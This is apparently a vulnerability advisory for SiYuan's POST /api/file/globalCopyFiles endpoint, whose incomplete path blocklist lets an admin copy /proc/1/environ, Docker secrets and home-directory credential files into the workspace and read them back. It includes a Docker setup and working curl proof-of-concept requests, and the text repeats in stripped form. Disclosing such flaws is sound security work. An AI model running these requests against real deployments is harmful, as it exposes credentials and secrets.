Summary
POST /api/file/globalCopyFiles reads source files using filepath.Abs() with no workspace boundary check, relying solely on util.IsSensitivePath() whose blocklist omits /proc/, /run/secrets/, and home directory dotfiles. An admin can copy /proc/1/environ or Docker secrets into the workspace and read them via the standard file API.
Details
File: kernel/api/file.go - function globalCopyFiles
for i, src := range srcs {
absSrc, _ := filepath.Abs(src)
if util.IsSensitivePath(absSrc) {
return
}
srcs[i] = absSrc
}
destDir := filepath.Join(util.WorkspaceDir, destDir)
for _, src := range srcs {
dest := filepath.Join(destDir, filepath.Base(src))
filelock.Copy(src, dest) // copies unchecked sensitive file into workspace
}IsSensitivePath blocklist (kernel/util/path.go):
prefixes := []string{"/etc/ssh", "/root", "/etc", "/var/lib/", "/."}Not blocked - exploitable targets:
| Path |
Contains |
| /proc/1/environ |
All env vars: DATABASE_URL, AWS_ACCESS_KEY_ID, ANTHROPIC_API_KEY |
| /run/secrets/* |
Docker Swarm / Compose injected secrets |
| /home/siyuan/.aws/credentials |
AWS credentials (non-root user) |
| /home/siyuan/.ssh/id_rsa |
SSH private key (non-root user) |
| /tmp/ |
Temporary files including tokens |
PoC
Environment:
docker run -d --name siyuan -p 6806:6806 \
-v $(pwd)/workspace:/siyuan/workspace \
b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123
Exploit:
TOKEN="YOUR_ADMIN_TOKEN"
curl -s -X POST http://localhost:6806/api/file/globalCopyFiles \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d '{"srcs":["/proc/1/environ"],"destDir":"data/assets/"}'
curl -s -X POST http://localhost:6806/api/file/getFile \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d '{"path":"/data/assets/environ"}' | tr '\0' '\n'Docker secrets:
curl -s -X POST http://localhost:6806/api/file/globalCopyFiles \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d '{"srcs":["/run/secrets/db_password","/run/secrets/api_token"],"destDir":"data/assets/"}'Impact
An admin can exfiltrate any file readable by the SiYuan process that falls outside the incomplete blocklist. In containerized deployments this includes all injected secrets and environment variables - a common pattern for passing credentials to containers. The exfiltrated files are then accessible via the standard workspace file API and persist until manually deleted.
Summary
POST /api/file/globalCopyFiles reads source files using filepath.Abs() with no workspace boundary check, relying solely on util.IsSensitivePath() whose blocklist omits /proc/, /run/secrets/, and home directory dotfiles. An admin can copy /proc/1/environ or Docker secrets into the workspace and read them via the standard file API.
Details
File: kernel/api/file.go - function globalCopyFiles
IsSensitivePath blocklist (kernel/util/path.go):
Not blocked - exploitable targets:
PoC
Environment:
docker run -d --name siyuan -p 6806:6806 \ -v $(pwd)/workspace:/siyuan/workspace \ b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123Exploit:
Docker secrets:
Impact
An admin can exfiltrate any file readable by the SiYuan process that falls outside the incomplete blocklist. In containerized deployments this includes all injected secrets and environment variables - a common pattern for passing credentials to containers. The exfiltrated files are then accessible via the standard workspace file API and persist until manually deleted.